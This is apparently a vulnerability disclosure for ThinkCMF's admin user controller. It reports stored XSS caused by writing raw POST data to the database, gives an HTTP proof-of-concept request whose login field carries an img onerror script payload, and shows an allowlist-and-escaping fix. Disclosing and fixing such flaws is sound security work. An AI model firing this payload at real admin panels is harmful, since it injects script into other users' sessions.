At vendor/thinkcmf/cmf-app/src/admin/controller/UserController.php
There is no filtering of the user's POST requests.
For example:
line 138:
$result = DB::name('user')->insertGetId($_POST);
line 221:
$result = DB::name('user')->update($_POST);
So there is a stored XSS vulnerability in user management.
POC:
POST /admin/user/addpost.html HTTP/1.1
Host: test.net
Connection: close
Content-Length: 115
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://test.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://test.net/admin/user/add.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: thinkphp_show_page_trace=0|0; admin_username=admin; PHPSESSID=ju91k4c4do16sl2qqac553edl1

user_login=%3Cimg+src%3D''+onerror%3Dalert(%2Fxss%2F)%3E&user_pass=123456&user_email=1111%40qqq.com&role_id%5B%5D=2
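The defensive counterpart to the pattern reported above, as an added example rather than ThinkCMF's own code or its fix: an allowlist of writable columns with per-field validation so that the request body is never handed to the query builder as-is, plus output escaping for whatever is later rendered. The names `USER_WRITABLE`, `buildUserRow` and `h` are hypothetical.

```php
<?php
// Added example, not ThinkCMF's code; function and constant names are hypothetical.
// Reported pattern: the whole request body is written to the table,
//   $result = DB::name('user')->insertGetId($_POST);
// so every key the client sends becomes a column value (mass assignment) and
// strings such as user_login reach the database, and later the admin page, unchecked.

// Allowlist: only the columns this form may write, each with its own check.
const USER_WRITABLE = [
    'user_login' => '/^[A-Za-z0-9_]{3,32}$/',   // rejects '<', quotes and spaces
    'user_email' => null,                         // validated with filter_var below
    'user_pass'  => '/^.{8,128}$/',
];

/** Builds the row to insert; unknown keys (e.g. role_id[]) are dropped, invalid values throw. */
function buildUserRow(array $post): array
{
    $row = [];
    foreach (USER_WRITABLE as $field => $pattern) {
        $value = $post[$field] ?? null;
        if (!is_string($value)) {
            throw new InvalidArgumentException("missing field: $field");
        }
        $ok = $pattern === null
            ? filter_var($value, FILTER_VALIDATE_EMAIL) !== false
            : preg_match($pattern, $value) === 1;
        if (!$ok) {
            throw new InvalidArgumentException("invalid value for $field");
        }
        $row[$field] = $value;
    }
    $row['user_pass'] = password_hash($row['user_pass'], PASSWORD_DEFAULT); // never store plaintext
    return $row; // safe to pass to ->insertGetId($row); role assignment needs its own authorization check
}

/** Output-side defence: escape anything echoed into HTML, whatever is in the database. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed input shaped like the reported request (a login name starting with '<img').
try {
    buildUserRow(['user_login' => "<img src=''", 'user_pass' => '123456',
                  'user_email' => '1111@qqq.com', 'role_id' => ['2']]);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}
echo h("<img src=''>"), PHP_EOL; // markup characters are escaped before rendering
```

The same allowlist applies to the `update($_POST)` call at line 221, which additionally needs an explicit `where` on the target user id so that a request cannot touch other rows.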
Removed the non-standard use of $_POST #675, fixing the XSS vulnerability
27e1fbe
fixed